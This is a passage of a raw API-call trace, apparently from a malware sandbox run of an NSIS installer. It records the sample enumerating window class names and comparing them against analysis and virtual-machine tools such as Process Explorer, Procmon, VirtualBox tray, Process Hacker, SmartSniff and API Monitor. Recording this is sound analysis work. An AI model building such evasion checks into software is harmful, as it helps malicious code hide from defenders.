iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.500] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.500] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.500] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.500] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.500] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.500] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.500] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.500] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.500] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.500] lstrcpynA (in: lpString1=0x341200, lpString2="65690", iMaxLength=1024 | out: lpString1="65690") returned="65690" [0158.500] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.500] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.500] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.500] GetWindowTextA (in: hWnd=0x1009a, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.501] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.501] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.501] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.501] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65690") returned 5 [0158.501] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.501] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.501] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.501] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.501] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.501] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.501] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.501] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.501] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.501] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.501] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.501] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.501] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.502] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.502] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.502] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.502] lstrcpynA (in: lpString1=0x340df8, lpString2="65690", iMaxLength=1024 | out: lpString1="65690") returned="65690" [0158.502] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.502] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.502] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.502] GetClassNameA (in: hWnd=0x1009a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.502] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.502] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65690") returned 5 [0158.502] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.502] lstrlenA (lpString="0") returned 1 [0158.502] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] lstrlenA (lpString="tooltips_class32") returned 16 [0158.502] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.502] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.502] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrlenA (lpString="tooltips_class32") returned 16 [0158.504] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.504] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrlenA (lpString="tooltips_class32") returned 16 [0158.504] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.504] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrlenA (lpString="tooltips_class32") returned 16 [0158.504] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.504] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.504] lstrlenA (lpString="") returned 0 [0158.504] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.504] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.504] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.504] lstrlenA (lpString="") returned 0 [0158.504] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.504] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.504] lstrlenA (lpString="3399936") returned 7 [0158.504] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.504] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.505] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.505] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.505] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.505] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.505] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrlenA (lpString="") returned 0 [0158.505] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrlenA (lpString="") returned 0 [0158.505] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrlenA (lpString="") returned 0 [0158.505] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.505] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.505] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.505] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.505] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.505] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.505] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.506] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.506] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.506] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.506] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.506] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.506] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.506] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.506] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.506] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.506] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.507] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.507] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.507] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.507] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.507] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.507] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.507] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.507] lstrlenA (lpString="0") returned 1 [0158.507] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.507] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.507] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.507] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.507] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.507] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.508] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.508] lstrlenA (lpString="0") returned 1 [0158.508] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrlenA (lpString="") returned 0 [0158.508] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.508] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.508] lstrlenA (lpString="3399936") returned 7 [0158.508] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.508] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.508] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.508] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.508] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.508] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.508] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.508] lstrlenA (lpString="") returned 0 [0158.508] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrlenA (lpString="") returned 0 [0158.509] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrlenA (lpString="") returned 0 [0158.509] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.509] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.509] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.510] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.510] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.510] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.510] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.510] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 